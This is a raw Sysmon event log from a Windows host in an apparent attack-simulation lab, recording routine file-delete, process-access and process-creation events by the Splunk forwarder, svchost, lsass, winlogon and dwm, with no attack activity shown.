09:21:43.623{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=AEC668429FA0A30DFB24C6BA03389550,SHA256=1F2AF725D52DB4674841F8BD114B2F741F11766D2A099DF5379C8A7CEA662C5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.623{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8835513297E0701DFC0B7769161A3F5F,SHA256=4A44B64B39D8E01A7C6E0D5EFBEF58014E0F2BE617BE8BC82A63CC70DD15554E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DD178D371A5E65DCA96A54B699AEE00,SHA256=0AB094405F93C2CCA5255F3ED45311B48F4AF619A5212B52730205417C20B7AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.592{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91B45F9567FFE686768F8CA55B911B23,SHA256=4BBAB52E6D979D698DA064131B5D46630F298BF8851626EA18D9408D59419C11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8D26-6151-8600-00000000FD01}12881096C:\Windows\system32\winlogon.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.507{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-2{5EBD8912-8D27-6151-59DA-070000000000}0x7da592SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001055175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1b140|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.498{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 